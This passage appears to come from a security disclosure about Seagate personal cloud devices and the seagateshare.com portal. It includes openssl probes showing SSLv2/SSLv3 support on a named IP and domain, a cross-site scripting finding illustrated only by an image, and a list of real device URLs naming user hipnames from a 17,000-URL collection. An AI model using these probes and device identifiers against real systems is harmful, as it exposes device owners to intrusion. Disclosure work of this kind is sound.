<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Accept: */*</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* HTTP 1.0, assume close after body</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< HTTP/1.0 302 Found</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Date: Mon, 08 Jan 2018 19:02:23 GMT</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Server: Apache/2.2.3 (Red Hat)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Powered-By: PHP/5.1.6</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-PHP-PID: 1541</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=472aad2b9377d2ee3fae12b78262bf51; </span><br />
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">expires=Tuesday, 09-Jan-18 19:02:23 GMT; path=/</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Expires: Mon, 08 Jan 2018 22:02:23 GMT</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Cache-Control: public, max-age=10800</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Last-Modified: Fri, 30 Sep 2011 21:03:07 GMT</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=472aad2b9377d2ee3fae12b78262bf51; </span><br />
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Language: en-US</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Window-target: _top</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Location: https://www.seagateshare.com/?hipname=earth1961</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Axentra-Version: 10.2.0</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Length: 0</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Connection: close</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Type: text/html; charset=UTF-8</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">$ openssl s_client -connect seagateshare.com:443 -ssl3</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CONNECTED(00000003)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">No client certificate CA names sent</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL handshake has read 3352 bytes and written 308 bytes</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Server public key is 2048 bit</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Secure Renegotiation IS supported</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Compression: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Expansion: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL-Session:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Protocol : SSLv3</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Cipher : DHE-RSA-AES256-SHA</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID: 726202AD9F5B5658518B30567129E66B4DC98B54BEAEA009A29E673058584CFC</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID-ctx: </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Master-Key: </span><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">16419B269EC97CE6A1D2062087C996FC46FD5BB4C3C93126D8263913782BBFF8</span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">C1112EFB41B1F</span><span style="background-color: transparent; font-family: "cambria"; font-size: 9pt; white-space: pre;">066F2D8F26AB3EEEEE5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Key-Arg : None</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Start Time: 1515437896</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Timeout : 7200 (sec)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Verify return code: 0 (ok)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">$</span><span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> openssl s_client -connect 81.107.113.155:443 -ssl2</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CONNECTED(00000003)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ciphers common between both SSL endpoints:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL handshake has read 832 bytes and written 236 bytes</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">New, SSLv2, Cipher is DES-CBC3-MD5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Server public key is 1024 bit</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Secure Renegotiation IS NOT supported</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Compression: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Expansion: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL-Session:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Protocol : SSLv2</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Cipher : DES-CBC3-MD5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID: 0149D7AE92D54EDD24E5F2DBDE5B4DE2</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID-ctx: </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Master-Key: 4B3916B4CC9F7556FFAC3E4F61C2D20D65C2C77AF37577EF</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Key-Arg : 43E615F0819EF446</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Start Time: 1515438170</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Timeout : 300 (sec)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Verify return code: 18 (self signed certificate)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Vulnerability 2:</span><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"> Cross-site Scripting in SaaS Web App : Seagateshare</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The web-based portal is vulnerable to Cross-site Scripting (XSS) attack by exploiting a </span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">content-injection </span><span style="font-family: "cambria"; font-size: 11pt; white-space: pre;">vulnerability. The issue persists due to inability of the web app to perform </span><br />
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre;">input validation for the arbitrary </span><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">values passed to the specific HTTP parameters. </span><span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">This results </span><br />
<span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">in execution of XSS payloads that could be </span><span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">exploited to perform multiple variations of web attacks </span><br />
<span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">such as cookie stealing, etc. A successful </span><span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">Proof-of-Concept (PoC) of the issue is presented below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="345" src="https://lh3.googleusercontent.com/_gQ1iZ0jhk3kEcusRwJkQ9jq3QdrtqhKxvECzJMGftIkHJkPv3zO_5pC3dpfK_uvC2a7SFfCTI7OZOXGIPKNZ0N5P7hYy62Sj_T2xgVooC68VUgi3GYWgBclwW3WuYBh8SIQx2mf" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Statistical Vulnerability Data </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It has been discovered that embedded server still supports SSLv2 / SSLv3 whereas the </span><br />
<a href="http://seagateshare.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">supports SSLv3. We have looked into 50,000+ devices that are running on </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">unique IPs that have </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">SSLv2/ SSLv3 enabled. Additionally, during standard tests, we have </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">collected 17000+ URLs </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">of </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> with unique device_ids. </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">A few examples are shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zrrocket" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zrrocket</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zseagate" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zseagate</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zurcruz" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zurcruz</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Location: </span><a href="https://www.seagateshare.com/?hipname=zurd2071" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=zurd2071</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
